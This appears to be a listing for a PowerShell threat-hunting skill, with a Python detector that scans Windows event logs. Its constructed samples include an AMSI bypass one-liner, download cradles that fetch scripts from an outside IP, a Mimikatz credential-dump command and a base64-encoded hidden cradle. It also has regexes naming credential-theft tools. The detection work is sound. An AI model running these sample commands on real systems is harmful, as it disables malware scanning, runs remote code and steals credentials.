Hunts malicious PowerShell activity in Windows EVTX logs (events 4104/4103) by parsing script blocks, detecting obfuscation, AMSI bypasses, encoded payloads, credential dumps, and download cradles.
Triggered by: the user, Claude, or both
Slash command: /cybersecurity-skills-zh:hunting-for-anomalous-powershell-execution
Summary shown in Claude's skill listing (used to decide when to auto-load this skill):
PowerShell Script Block Logging (Event ID 4104) records the full de-obfuscated text of every script block executed on a Windows endpoint, which makes it the primary data source for hunting malicious PowerShell: code that is built at runtime and run through Invoke-Expression is logged again as its own 4104 event when it executes. Combined with Module Logging (4103) and process-creation events, analysts can detect encoded commands, AMSI bypass patterns, download cradles, credential-theft tools and fileless techniques even when the attacker has layered obfuscation on top. Large scripts are split across several 4104 events (MessageNumber/MessageTotal), so fragments should be reassembled by ScriptBlockId before pattern matching.
{
"total_events": 1247,
"suspicious_events": 23,
"amsi_bypass_attempts": 2,
"encoded_commands": 8,
"download_cradles": 5,
"credential_access": 3
}
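As an added example (not the skill's own code, nor its rule set), the following Python hunter walks a constructed set of 4104/4103/4688 records, decodes -EncodedCommand payloads (base64 of UTF-16LE), runs illustrative regexes for AMSI bypass, download cradles, credential access and obfuscation over both the raw text and the decoded payload, and produces a summary in the same shape as the JSON report above. The event field names, the sample events and the detection patterns are assumptions chosen for this example; a real hunt would feed in records parsed from EVTX and use a tuned, broader signature set.

```python
import base64
import json
import re

# Summary keys mirror the JSON report shape used on this page.
SUMMARY_KEYS = ("total_events", "suspicious_events", "amsi_bypass_attempts",
                "encoded_commands", "download_cradles", "credential_access", "obfuscated")

# Illustrative detection patterns per category (assumed for this example, not the skill's own rules).
PATTERNS = {
    "amsi_bypass_attempts": re.compile(
        r"amsiInitFailed|AmsiUtils|AmsiScanBuffer|amsiContext", re.I),
    "download_cradles": re.compile(
        r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b"
        r"|Invoke-RestMethod|Start-BitsTransfer", re.I),
    "credential_access": re.compile(
        r"Invoke-Mimikatz|sekurlsa|lsass|DumpCreds|MiniDump|Invoke-Kerberoast|Get-Keystrokes", re.I),
    "obfuscated": re.compile(
        r"[A-Za-z]`[A-Za-z]"       # backtick splitting a token, e.g. I`EX
        r"|\[char\]\s*\d+"         # [char]73 style byte-by-byte string construction
        r"|FromBase64String"       # inline base64 decoding of a payload
        r"|'[^']*'\s*\+\s*'"       # 'Inv'+'oke-Expression' keyword splitting
        r"|-join\b", re.I),
}
# -EncodedCommand and its short forms (-e, -ec, -enc) followed by a base64 blob.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Constructed sample data: an encoded cradle as an attacker would pass it to powershell.exe.
ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/b.ps1')".encode("utf-16-le")
).decode()

# Constructed sample events (not real logs); field names are assumptions for this example.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    {"EventID": 4104, "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                                         ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"EventID": 4104, "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"},
    {"EventID": 4104, "ScriptBlockText": "Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'"},
    {"EventID": 4104, "ScriptBlockText": "& ('Inv'+'oke-Expr'+'ession') ([char]119+[char]104+[char]111+[char]97+[char]109+[char]105)"},
    {"EventID": 4103, "Payload": "CommandInvocation(Get-Process): \"Get-Process\""},
    {"EventID": 4688, "CommandLine": "powershell.exe -nop -w hidden -enc " + ENC_PAYLOAD},
    {"EventID": 4624, "ScriptBlockText": ""},   # unrelated logon event, skipped by the hunter
]


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64) or None if absent/invalid."""
    m = ENCODED_RE.search(command_line or "")
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(text):
    """Return the set of categories whose patterns match the given script text."""
    return {name for name, rx in PATTERNS.items() if rx.search(text)}


def inspect(text):
    """Classify one script block / command line, decoding and classifying any encoded payload too."""
    decoded = decode_encoded_command(text)
    # Replace the base64 blob before matching so random blob bytes cannot trip a keyword regex.
    categories = classify(ENCODED_RE.sub("-enc <base64>", text))
    if decoded is not None:
        categories.add("encoded_commands")
        categories |= classify(decoded)
    return categories, decoded


def analyze(events):
    """Walk PowerShell-relevant events and return a summary plus per-event findings."""
    summary = {k: 0 for k in SUMMARY_KEYS}
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4104:            # Script Block Logging: de-obfuscated block text
            text = ev.get("ScriptBlockText", "")
        elif eid == 4103:          # Module Logging: pipeline/command invocation payload
            text = ev.get("Payload", "")
        elif eid == 4688:          # Process creation: the raw command line
            text = ev.get("CommandLine", "")
        else:
            continue
        summary["total_events"] += 1
        categories, decoded = inspect(text)
        if not categories:
            continue
        summary["suspicious_events"] += 1
        for c in categories:
            summary[c] += 1
        findings.append({"EventID": eid, "categories": sorted(categories),
                         "text": text[:80], "decoded": decoded})
    return {"summary": summary, "findings": findings}


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_EVENTS), indent=2))
```

The decoded payload is classified a second time so that a cradle hidden behind -EncodedCommand is counted as both an encoded command and a download cradle, which is why the sample run reports two cradles from only one plaintext cradle event.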
Install: npx claudepluginhub killvxk/cybersecurity-skills-zh
Parses Windows EVTX files for malicious PowerShell via Event 4104/4103 logs, detecting AMSI bypasses, obfuscated commands, encoded payloads, credential dumping, and download cradles. For threat hunting and incident analysis.
Analyzes Windows EVTX files to detect malicious PowerShell activity, including obfuscated commands, AMSI bypasses, encoded payloads, and credential dumping, using Script Block Logging (Event 4104) as the primary source.